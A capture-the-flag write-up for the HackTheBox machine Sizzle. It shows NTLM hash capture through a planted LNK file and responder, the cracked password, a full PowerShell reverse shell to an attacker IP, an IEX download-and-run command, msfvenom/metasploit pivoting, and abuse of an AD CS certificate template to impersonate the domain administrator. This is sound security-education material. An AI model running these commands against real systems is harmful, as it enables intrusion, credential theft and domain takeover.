Sizzle @ hackthebox – Unintended: Getting a Logon Smartcard for the Domain Admin!

My writeup – how to pwn my favorite box on hackthebox.eu, using a (supposedly) unintended path. Sizzle – created by @mrb3n813 and @lkys37en – was the first box on HTB that had my favorite Windows Server Role – the Windows Public Key Infrastructure / Certification Authority.

This CA allows the low-privileged user – amanda – to issue herself a client authentication certificate, which you can then use to start a remote management session with PowerShell.

To root Sizzle the (supposedly) intended way, you ‘sizzled’ another user (Kerberoasting), and then abused a special permission granted to that user to run DCSync and steal the Administrator’s hash. Pass-the-hash gives you an admin shell.

But a loophole in the configuration of the PKI lets you go from amanda to root directly.

Summary – tl;dr: amanda can edit the templates for certificates, and add the Extended Key Usages required for Smartcard Logon. Submitting a certificate request with the Administrator’s name(s) to the CA gives you a credential to impersonate the admin. Importing certificate and key onto a physical card or crypto token lets you use command line tools with the option /smartcard. In order to make these tools work, you need to join a Windows box to sizzle’s domain and set up a fake DNS server with service records for this domain.

Contents

Initial Enumeration: Spotting the Windows PKI!
Confirming a theory about client certificates, and playing with revocation lists.
Enumerating domain users over Kerberos UDP.
Writing a LNK file to the share, and sniffing amanda’s hash.
Enrolling a client certificate for amanda and starting a PS Session.
Background. The UPN risk. Discovering the misconfiguration of certificate templates.
Considering potential attack vectors: Software certificates versus hardware logon tokens.
Getting a meterpreter shell and routing traffic through it.
Preparing a Certificate Signing Request on behalf of the Administrator.
Editing templates and first attempt of attack setup: msf on Windows!
Editing certificate templates and requesting ‘malicous’ client auth certificates. PSSession Let-Down.
Creating a hardware logon token for impersonating the Administrator
Proxies, fake DNS, and forwarding ports once more with proxychains socat
Joining a Windows client to the htb.local domain
Summary of the solution so far
Finally: Using the Administrator’s token!
Creating a (not really stealthy) backdoor admin

Initial Enumeration: Spotting the Windows PKI!    [>> Contents]

The portscan reveals many open ports – which tell us that Sizzle is a Windows Domain Controller of a domain called htb.local. However, Kerberos TCP 88 is missing – and this will come back to haunt us later :-)

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-13T16:09:41+00:00; +24s from scanner time.
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-13T16:09:42+00:00; +24s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-13T16:09:41+00:00; +23s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-13T16:09:42+00:00; +24s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: HTB.LOCAL, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=sizzle.htb.local
| Not valid before: 2018-07-03T17:58:55
|_Not valid after:  2020-07-02T17:58:55
|_ssl-date: 2019-01-13T16:09:41+00:00; +23s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp  open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=sizzle.HTB.LOCAL
| Subject Alternative Name: othername:<unsupported>, DNS:sizzle.HTB.LOCAL
| Not valid before: 2018-07-02T20:26:23
|_Not valid after:  2019-07-02T20:26:23
|_ssl-date: 2019-01-13T16:09:41+00:00; +23s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
52562/tcp open  msrpc         Microsoft Windows RPC
52582/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.70%I=7%D=1/13%Time=5C3B622E%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SIZZLE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 23s, deviation: 0s, median: 22s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2019-01-13 17:09:41
|_  start_date: 2019-01-12 20:01:42

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.39 seconds

The webserver on port 80 only shows an image of sizzling bacon, but port 443 and its TLS certificate immediately have my attention: The CRL (Certificate Revocation List) Distribution Point extension is the tell-tale sign of an Active-Directory-integrated Windows PKI – it points to an object in the configuration container of AD:

There is also an FTP server to which we can logon anonymously – but it neither holds any files nor lets us upload any. I spent a while writing a python tool to fuzz for other FTP folders!
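A minimal sketch of such a fuzzer could look like this (wordlist file name is illustrative, not the original tool):

#!/usr/bin/env python3
# Minimal FTP folder fuzzer sketch - tries to CWD into candidate folder names
from ftplib import FTP, error_perm

target = '10.10.10.103'

with open('ftp-dirs.txt') as f:
    candidates = [line.strip() for line in f if line.strip()]

ftp = FTP(target)
ftp.login()                      # anonymous login
for name in candidates:
    try:
        ftp.cwd('/' + name)      # try to change into the candidate folder
        print('[+] Found folder: /' + name)
        ftp.cwd('/')
    except error_perm:
        pass                     # 550: folder does not exist or no access
ftp.quit()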

I can enumerate the SMB shares – among them some non-default ones – with smbclient:

smbclient -L //10.10.10.103 -N

       Sharename       Type      Comment
       ---------       ----      -------
       ADMIN$          Disk      Remote Admin
       C$              Disk      Default share
       CertEnroll      Disk      Active Directory Certificate Services share
       Department Shares Disk     
       IPC$            IPC       Remote IPC
       NETLOGON        Disk      Logon server share
       Operations      Disk     
       SYSVOL          Disk      Logon server share

Again, there is the signature Windows PKI share – the CertEnroll share, for downloading the CA certificate and revocation lists. The comment gives away the exact name of the server role: Active Directory Certificate Services.

Confirming a theory about client certificates, and playing with revocation lists. [>> Contents]

The Windows CA has an optional web interface – a simple ASP web application – to be found at /certsrv. Accessing it with the browser confirms that it is installed, but as expected (default config) it cannot be accessed anonymously.

So I need credentials of a Windows domain user – then I would be able to enroll for a client certificate. The Windows web server IIS allows either for 1:1 manual mapping of individual certificates or for Active-Directory-based mapping, which matches the User Principal Name in the certificate to the user with the same UPN in AD. This will also become important later, for the unintended method.

I want to confirm that I will be able to use a client certificate for something. What web applications are there? Ports 5986 and 5985 stick out – the default ports for WinRM – Windows Remote Management Service.

In order to test WinRM, I forward the relevant ports from Kali Linux to a Windows box:

socat TCP-LISTEN:5985,fork TCP:10.10.10.103:5985 &
socat TCP-LISTEN:5986,fork TCP:10.10.10.103:5986 &

If I want to use client certificates, I’d better also get the validation of the server certificate right first. So I add the host name sizzle.htb.local to the hosts file on Windows, with the IP address of my Kali box; then I need the CA certificate(s).

I downloaded the CA certificate by ‘guessing’ the default HTTP download path a Windows CA uses. This is the Issuer Name as displayed in the TLS server certificate:

CN = HTB-SIZZLE-CA
DC = HTB
DC = LOCAL

… so the default HTTP Path to a Windows CA certificate is:

http://sizzle.htb.local/CertEnroll/sizzle.htb.local_HTB-SIZZLE-CA.crt

This URL can, as an option, be added to the certificate extension AIA – Authority Information Access – of issued certificates. Sizzle does not use that, but only has LDAP AIA URLs, so you don’t see the URL in the TLS server certificate. The web URL works nonetheless.

It is a self-signed certificate, so there is only ‘one level’ in this PKI, and I import the certificate into the Trusted Root Certification Authorities store on Windows with certmgr.msc. A test of the certificate chain with …

certutil -verify sizzle.htb.local

… fails with a revocation error, as expected. The ‘serverless’ LDAP:/// URL pointing to the CRL objects is not available for two reasons: You do not find the actual LDAP server (yet), and you cannot access Active Directory anonymously.

But the CRL file is also there at the default ‘guessed’ URL – the file name being equal to the Common Name on the CA’s certificate:

http://sizzle.htb.local/CertEnroll/HTB-SIZZLE-CA.crl

The revocation check still fails after importing that file, because the Sizzle CA also uses the default Delta CRLs. The Base CRL hints at the existence of an ‘incremental’ Delta CRL via the extension Freshest CRL:

The Delta CRL is also available at the default HTTP URL:

http://sizzle.htb.local/CertEnroll/HTB-SIZZLE-CA+.crl

Both CRL files can be imported on the Windows box I want to use for the PSSession, using certutil or certmgr.msc:
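If you prefer the command line over certmgr.msc, the imports should work roughly like this (file names as downloaded above; the exact target stores are my assumption):

certutil -addstore -user Root sizzle.htb.local_HTB-SIZZLE-CA.crt
certutil -addstore -user CA HTB-SIZZLE-CA.crl
certutil -addstore -user CA "HTB-SIZZLE-CA+.crl"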

So we are finally ready for the ‘expected error message’, trying to start an unauthenticated session with:

Enter-PSSession -ComputerName sizzle.htb.local -UseSSL

… and we indeed learn that we should use client certificates \o/

If you get tired of playing with CRLs (to be re-imported every few days), you can also skip the revocation check directly in PowerShell:

Enter-PSSession -ComputerName sizzle.htb.local -UseSSL -SessionOption (New-PSSessionOption -SkipRevocationCheck)

Enumerating domain users over Kerberos UDP. [>> Contents]

I consider brute-forcing the password for a user, so I need to confirm which users actually exist. I mount all SMB shares I can, incl. the share Department Shares:

mount.cifs '//sizzle/Department Shares' smbfs

Contents of smbfs:

 Accounting      Devops    Infrastructure   Marketing   Tax
 Audit           Finance   IT              'R&D'        Users
 Banking         HR        Legal            Sales       ZZ_ARCHIVE
 CEO_protected   Infosec  'M&A'             Security

The folder Users contains a bunch of sub-folders:

amanda      bill  chris  joe   lkys37en  mrb3n
amanda_adm  bob   henry  jose  morgan    Public

… from whose names, plus a bunch of default names (such as Administrator or guest), I create a list of potential users – users.txt:

administrator
guest
DefaultAccount
amanda
amanda_adm
bill
bob
chris
henry
joe
jose
lkys37en
morgan
mrb3n

nmap has a script for enumerating users over Kerberos UDP 88. This port is accessible externally, in contrast to TCP 88:

nmap -sU -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='htb.local',userdb=users.txt -vvv 10.10.10.103

I can confirm that guest, amanda, and Administrator do exist:

PORT   STATE         SERVICE      REASON
88/udp open|filtered kerberos-sec no-response
| krb5-enum-users:
| Discovered Kerberos principals
|     administrator@htb.local
|     amanda@htb.local
|_    guest@htb.local

However, I was not able to brute-force amanda’s password in a reasonable time. I think hydra cannot do an NTLM logon, only Basic Authentication. A trace of a logon attempt via the browser shows the NTLM logon:

Writing a LNK file to the share, and sniffing amanda’s hash. [>> Contents]

Having also tried unsuccessfully to brute-force the logon over SMB (with hydra and the metasploit module smb_login), I poke around the shares again. Finally, I realize that I can write to the folder /Users/Public in the share Department Shares.

What if somebody – a simulated amanda user, hopefully – were to ‘look’ at files I write there periodically? So I re-use part of what I did on the box Ethereal, and create a ‘malicious’ shortcut file – a link pointing to my own box.

I used the powershell commands provided in this article to create a simple LNK file:

$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("test.lnk")
$lnk.TargetPath = "\\10.10.14.21\share"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "Hi there"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()

I started responder on Kali as my fake file server with

responder -wrf -v -I tun0

… then copy my test.lnk to the folder /Users/Public, and immediately get a callback. I can collect lots of hashes, like this one:

[SMBv2] NTLMv2-SSP Client   : 10.10.10.103
[SMBv2] NTLMv2-SSP Username : HTB\amanda
[SMBv2] NTLMv2-SSP Hash     : amanda::HTB:0ca7982a6e25e95b:4281E64C70D54C315DD06861D421C2D5:0101000000000000C0653150DE09D2013E33784022E5E1CD000000000200080053004D004200330001001E00570049004E002D00500052004800340039003200520051004100460056000400140053004D00420033002E006C006F00630061006C0003003400570049004E002D00500052004800340039003200520051004100460056002E0053004D00420033002E006C006F00630061006C000500140053004D00420033002E006C006F00630061006C0007000800C0653150DE09D201060004000200000008003000300000000000000001000000002000000A1A989A69067922647E05D8B94A1515425B93A3DFC90D4731FD9EBAD8C7C05F0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003900000000000000000000000000

The hash can be cracked quickly with hashcat. Checking the list of example hashes shows that we need hash type 5600 for cracking NTLMv2 hashes:

hashcat64.exe -m 5600 _hashes\sizzle-amanda.txt _wordlists\rockyou.txt

Now I have amanda’s password:

Ashare1972

Enrolling a client certificate for amanda and starting a PS Session. [>> Contents]

I can finally logon to the /certsrv web application as amanda. This website lets you either submit a certificate signing request you generated with any tool – like openssl, or certreq on Windows – or let the web site trigger the key generation for you. I wanted the certificate as quickly as possible, so I picked the latter method (I am going to show the file-based method in the part about the unintended way).

I socat port 443 to the Windows box, start Internet Explorer, and enter the user HTB\amanda and her password …

Clicking on Request a certificate shows the page with the two options:

Advanced certificate request refers to either sending a pre-created CSR or changing certificate attributes. I pick User Certificate, which does a next-next-finish key generation and request submission, pulling all needed attributes from Active Directory:

Clicking Submit may result in an error if the server has not been added to the Intranet Zone in IE security settings. After fixing that, I get the ActiveX popup – now a key is generated in my personal certificate store and the request is sent to the Sizzle CA:

OK … waiting for the response … and one more ActiveX popup:

Finally the certificate is ‘installed’, that is, imported to the personal store and re-united with its key. (Save response gives you the option to also save the BASE64-encoded certificate.)

The certificate is now visible under Personal Certificates in certmgr.msc, or can be checked with certutil:

certutil -store -user my

Relevant part of the output:

...
================ Certificate 8 ================
Serial Number: 6900000016942f3e8913c6b5ec000000000016
Issuer: CN=HTB-SIZZLE-CA, DC=HTB, DC=LOCAL
 NotBefore: 17.01.2019 17:38
 NotAfter: 17.01.2020 17:38
Subject: CN=amanda, CN=Users, DC=HTB, DC=LOCAL
Certificate Template Name (Certificate Type): User
Non-root Certificate
Template: User
Cert Hash(sha1): 04b832d04ec8ae222aa24a80ac064f481d2abc15
  Key Container = {FD89D358-0EA3-49C9-B102-48EFB2C24D5F}
  Unique container name: 1d1f0d178a2e6518c18d17f5d6e8e881_daa0af9e-c489-45ac-9159-1f80602318c7
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Encryption test passed
CertUtil: -store command completed successfully.

The verbose output of certutil

certutil -v -store -user my 04b832d04ec8ae222aa24a80ac064f481d2abc15

… shows (among many other extensions) that this is a multi-purpose certificate for Client Authentication, E-Mail, and Encrypting File System. It also contains amanda’s User Principal Name, which maps the certificate to a user for logon purposes:

...
2.5.29.37: Flags = 0, Length = 22
Enhanced Key Usage
Encrypting File System (1.3.6.1.4.1.311.10.3.4)
Secure Email (1.3.6.1.5.5.7.3.4)
Client Authentication (1.3.6.1.5.5.7.3.2)

2.5.29.17: Flags = 0, Length = 24
Subject Alternative Name
Other Name:
Principal Name=amanda@HTB.LOCAL
...

The SHA1 hash is used in the PS command to refer to that certificate, and finally we can logon as amanda!

Enter-PSSession -ComputerName sizzle.htb.local -UseSSL -CertificateThumbprint 04b832d04ec8ae222aa24a80ac064f481d2abc15

… or, if my imported CRLs have expired, using:

Enter-PSSession -ComputerName sizzle.htb.local -UseSSL -SessionOption (New-PSSessionOption -SkipRevocationCheck) -CertificateThumbprint 04b832d04ec8ae222aa24a80ac064f481d2abc15

And I am amanda! \o/

[sizzle.htb.local]: PS C:\Users\amanda\Documents>

The good thing about all certificates created for accessing sizzle: They also remain valid when the box is reset! The DC validates the certificate path, attributes, dates, and revocation status, but the CA does not check whether the certificate is in its database!

Background. The UPN risk. Discovering the misconfiguration of certificate templates. [>> Contents]

Certificate templates are LDAP objects whose attributes define what future certificates created from this template will look like, and who can enroll for it. If you can edit all properties of a certificate template or create a new one, you can become whoever you want in a Windows AD forest:

If AD-based mapping is enabled in applications using certificates for logon, the User Principal Name in a certificate is automatically mapped to the AD user with the corresponding userPrincipalName attribute in the user’s LDAP object. So mapping is based on a string ‘only’. Why is that secure? Because any application using AD for logon also checks whether the CA’s certificate has been imported into a special object in the Public Key Services container (NTAuth). By default, this object can only be managed by Enterprise Admins – and so can certificate templates!
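If you want to see which CA certificates are trusted for this kind of mapping, certutil can dump the NTAuth store (syntax from memory, on a domain-joined box):

certutil -enterprise -store NTAuth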

The following templates are available for amanda at (‘published to’) the Sizzle CA, as the dropdown menu in the certsrv application (advanced options, file-based request) shows. I do not want to mess up other hackers’ certificate requests, so I focus on the template for the server – SSL – assuming that everybody else will try to use the templates related to User… So I check out the permissions on the templates with

certutil -v -dstemplate

That command also runs in the constrained powershell shell. It results in a super detailed list of all attributes of all templates in AD! This is the start of the output for the SSL template – and *yikes*:

Authenticated Users – that is, every user and every computer account in the forest(!) – are able to change that template!

[SSL]
    objectClass = "top", "pKICertificateTemplate"
    cn = "SSL"
    distinguishedName = "CN=SSL,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=HTB,DC=LOCAL"
    instanceType = "4"
    whenCreated = "20180703180611.0Z" 7/3/2018 1:06 PM
    whenChanged = "20180703180645.0Z" 7/3/2018 1:06 PM

    displayName = "SSL"
    uSNCreated = "16440" 0x4038
    uSNChanged = "16445" 0x403d
    showInAdvancedViewOnly = "TRUE"
    nTSecurityDescriptor = "D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-2379389067-1826974543-3574127760-519)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;LA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)"

    Allow Full Control    HTB\Domain Administrators
    Allow Full Control    HTB\Enterprise Admins
    Allow Full Control    HTB\Administrator
    Allow Full Control    NT AUTHORITY\Authenticated Users

So far, this template is only for Server Authentication, but it already has a desired property: Names can be sent in the request, as you would expect for a server certificate:

    name = "SSL"
    objectGUID = "50e0c82d-3a98-4bab-98a0-a8cf58e27c86"
    flags = "131649" 0x20241
    CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
      (CT_FLAG_ADD_EMAIL -- 2)
      (CT_FLAG_ADD_OBJ_GUID -- 4)
      (CT_FLAG_PUBLISH_TO_DS -- 8)
      (CT_FLAG_EXPORTABLE_KEY -- 10 (16))
      (CT_FLAG_AUTO_ENROLLMENT -- 20 (32))
    CT_FLAG_MACHINE_TYPE -- 40 (64)
      (CT_FLAG_IS_CA -- 80 (128))
      (CT_FLAG_ADD_DIRECTORY_PATH -- 100 (256))
    CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
      (CT_FLAG_ADD_SUBJECT_DIRECTORY_PATH -- 400 (1024))
      (CT_FLAG_IS_CROSS_CA -- 800 (2048))
      (CT_FLAG_DONOTPERSISTINDB -- 1000 (4096))
      (CT_FLAG_IS_DEFAULT -- 10000 (65536))
    CT_FLAG_IS_MODIFIED -- 20000 (131072)
      (CT_FLAG_IS_DELETED -- 40000 (262144))
      (CT_FLAG_POLICY_MISMATCH -- 80000 (524288))

If we only had the User template, we would have to set this flag ourselves to allow the ‘enrollee’ to supply a name. With it, amanda can add any UPN of her liking to a logon certificate, like Administrator@HTB.LOCAL, and the CA will accept it.

The Extended Key Usage will need amendment:

    pKIExtendedKeyUsage = "1.3.6.1.5.5.7.3.1" Server Authentication
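After the template edits described later, this attribute should roughly end up containing the standard OIDs for client and smartcard logon instead:

    pKIExtendedKeyUsage = "1.3.6.1.5.5.7.3.2" Client Authentication
    pKIExtendedKeyUsage = "1.3.6.1.4.1.311.20.2.2" Smart Card Logon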

Considering potential attack vectors: Software certificates versus hardware logon tokens. [>> Contents]

This could potentially be abused in two ways:

Issue a (software-based) client authentication certificate in the Administrator’s name and use that to enter a PSSession as the admin. This requires adding the UPN and including the EKU Client Authentication – as PowerShell checks for that. Spoiler: Certificate issuance does work, but the logon finally does not. Domain Admins are not allowed to use WinRM.

Issue a (software-based) certificate that also includes the Extended Key Usage called Smart Card Logon. Then use Windows command line tools that have the option /smartcard. Candidate commands are:

net use \\sizzle.htb.local\c$ /smartcard

runas /smartcard cmd

The latter should require – or at least is much easier and more straightforward when you have – a client joined to sizzle’s domain! But that is something that should work for a low-privileged user. Years ago I used to renew a (legit ;-)) smartcard as a member of a domain whose network I hardly ever entered: I regularly joined a test box to this domain over VPN – so I am determined to join a box to HTB.LOCAL now!

But in order to join a box to the domain, logon, or edit templates using the Certificate Templates management console, I need access to all the ports!

Getting a meterpreter shell and routing traffic through it. [>> Contents]

The powershell shell is limited, as a test of the language mode shows:

[sizzle.htb.local]: PS
C:\Users\amanda\Documents> $ExecutionContext.SessionState.LanguageMode

ConstrainedLanguage

Fortunately version 2 of Powershell is available, so this can be bypassed with

[sizzle.htb.local]: PS C:\Users\amanda\Documents> powershell.exe -version 2 -c 'write-host $ExecutionContext.SessionState.LanguageMode'

FullLanguage

I wanted to get a meterpreter shell to be able to forward ports that are not exposed externally. After zillions of failed attempts to run a payload despite Defender (Ebowla, unicorn…), this was the method that worked reliably for me:

Get a simple ‘nishang’ shell, by running this code …

$client = New-Object System.Net.Sockets.TCPClient('10.10.14.21',8998);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

… from a script on my webserver:

[sizzle.htb.local]: PS C:\Users\amanda\Documents> powershell.exe -version 2 -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.21:81/nishang.ps1')"

I receive the simple shell with metasploit using this handler:

use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.14.21
set LPORT 8998
exploit -j

Prepare a psh (powershell) payload:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.21 LPORT=8999 -f psh -o sh.ps1

Start a handler for meterpreter – 2nd stage encoding is crucial, otherwise the shell dies immediately, killed by Defender I guess:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.21
set LPORT 8999
set ExitOnSession false
set EnableStageEncoding true
exploit -j

I run the powershell payload via the msf module, using the simple shell session (1):

use post/windows/manage/powershell/load_script
set SCRIPT sh.ps1
set SESSION 1

… and I now have two sessions. With msf I often needed two attempts, so I now have the simple shell as session 1 and the meterpreter shell as session 3:

msf5 post(windows/manage/powershell/load_script) > sessions

Active sessions
===============

  Id  Name  Type                     Information          Connection
  --  ----  ----                     -----------          ----------
  1         shell x64/windows                             10.10.14.21:8998 -> 10.10.10.103:65378 (10.10.10.103)
  3         meterpreter x64/windows  HTB\amanda @ SIZZLE  10.10.14.21:8999 -> 10.10.10.103:65384 (10.10.10.103)

The benefit of the meterpreter shell is the option to route otherwise inaccessible ports to my Kali box. I set an entry for the to-be-created socks proxy server in my /etc/proxychains.conf

...
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
# socks4        127.0.0.1 9050
socks4  127.0.0.1 8088
...

A socks proxy is created as a job in metasploit:

use auxiliary/server/socks4a
set SRVPORT 8088
run

… and I finally route traffic for sizzle through the meterpreter session 3:

route add 10.10.10.0 255.255.255.0 3

Preparing a Certificate Signing Request on behalf of the Administrator. [>> Contents]

Certificate templates dictate some of the properties of a certificate, so in the request you only need to add the attributes and extensions that you can actually enforce. I created all CSRs with the Certificates MMC (certmgr.msc) for the current user.

The request has to include the UPN in the Subject Alternative Name. In case some non-default name-mapping is in place I also make sure the subject name is correct – as cross-checked with the properties of the Administrator user in AD, in amanda’s PSSession:

[sizzle.htb.local]: PS C:\> $users = get-aduser -filter *
[sizzle.htb.local]: PS C:\> $users
DistinguishedName : CN=Administrator,CN=Users,DC=HTB,DC=LOCAL
Enabled           : True
GivenName         :
Name              : Administrator
ObjectClass       : user
ObjectGUID        : fcf33152-0104-4ccb-8db6-3ec7f3549ca8
SamAccountName    : Administrator
SID               : S-1-5-21-2379389067-1826974543-3574127760-500
Surname           :
UserPrincipalName :

Note that the UPN is empty – as is the UPN of all AD users. And yet, amanda’s logon certificate had the UPN, so some ‘default name routing’ is in place.

Now craft a custom request, using this information:

Also make sure that the key is exportable and matches the minimum size. The minimum size is displayed in the certutil dump of the template’s properties inspected earlier:

    msPKI-Minimal-Key-Size = "2048" 0x800

For usage on a smartcard, the card’s chip and middleware also need to support that size. I use a ‘legacy’ crypto provider, which does not matter here.

Next – next – finish, save the BASE64 file. Check the contents of the request with certutil to make sure the UPN is included:

certutil Administrator-2018bit.req.txt...
Attribute[3]: 1.2.840.113549.1.9.14 (Certificate Extensions)
Value[3][0], Length = ae
Certificate Extensions: 5
2.5.29.17: Flags = 0, Length = 2b
Subject Alternative Name
    Other Name:
        Principal Name=administrator@htb.local
...
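As an alternative to the MMC wizard, the same CSR could have been built from an INF file with certreq – a sketch (file names are illustrative; the SAN syntax is the documented certreq format for including a UPN):

[Version]
Signature = "$Windows NT$"

[NewRequest]
Subject = "CN=Administrator,CN=Users,DC=HTB,DC=LOCAL"
KeyLength = 2048
Exportable = TRUE
RequestType = PKCS10
ProviderName = "Microsoft Enhanced Cryptographic Provider v1.0"

[Extensions]
; Subject Alternative Name carrying the admin's UPN
2.5.29.17 = "{text}"
_continue_ = "upn=administrator@htb.local&"

certreq -new Administrator.inf Administrator.req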

Editing templates and first attempt of attack setup: msf on Windows! [>> Contents]

I installed metasploit directly on Windows and repeated all the steps described above. I used a Windows domain controller, because I wanted to forward DNS queries from my DC to sizzle.htb.local, using the Sizzle box as a Conditional Forwarder for the domain htb.local:
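A sketch of how such a conditional forwarder could also be added from PowerShell on the DC, assuming the DnsServer module is available:

Add-DnsServerConditionalForwarderZone -Name "htb.local" -MasterServers 10.10.10.103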

It is not sufficient to configure a hosts record for sizzle.htb.local, as the Windows logon requires correct replies to queries for several service – SRV – records. But I cannot configure Sizzle as the primary DNS server for that box – as this box also has to maintain the openVPN connection! So my DC forwarded requests to Sizzle:

C:\hackthebox>nslookup
Default Server:  localhost
Address:  127.0.0.1

> sizzle.htb.local
Server:  localhost
Address:  127.0.0.1

Non-authoritative answer:
Name:    sizzle.htb.local
Addresses:  dead:beef::6d6e:7369:708a:e8a8
          10.10.10.103

After I started the WinRM session on this Windows DC, I could automagically access services on Sizzle via Microsoft Management Consoles, as described here, and it seems the externally available RPC/DCOM ports were sufficient. I was also able to use other MMCs, such as Active Directory Users and Computers:

… and the desired Certificate Templates console. I re-targeted my console to Sizzle:

Here is the template SSL we want to abuse:

Editing certificate templates and requesting ‘malicous’ client auth certificates. PSSession Let-Down. [>> Contents]

I just change the Extended Key Usage / Application Policies extension to also include Client Authentication:

After saving the template, new certificates issued via the /certsrv web application will show the updated Extended Key Usages. I am using the ‘advanced’ request options – as no new key is generated but just a file is HTTP POSTed, there is no ActiveX control troubleshooting involved:

Note: You could add the UPN ‘again’ in the Attributes field, using the syntax

UPN:administrator@htb.local

But this is only required if the CSR does not yet contain the UPN, and using the form field requires an additional registry flag to be set at the CA. However, re-adding the UPN here does not hurt either…
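The flag in question is the well-known EDITF_ATTRIBUTESUBJECTALTNAME2 setting; a CA admin would enable it roughly like this, followed by a restart of the CA service:

certutil -setreg policy\EditFlags +EDITF_ATTRIBUTESUBJECTALTNAME2
net stop certsvc & net start certsvc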

The certificate is again returned immediately – it shows the intended UPN and these EKUs:

Client Authentication (1.3.6.1.5.5.7.3.2)
Server Authentication (1.3.6.1.5.5.7.3.1)

However, logging on to the PSSession fails! It also fails with a certificate for the other Domain Administrator, sizzler@htb.local, and it does not help to remove Server Authentication or to spell the domain as HTB.LOCAL. So Domain Admins are not allowed to use WinRM:

So I need to turn to the harder option 2 …
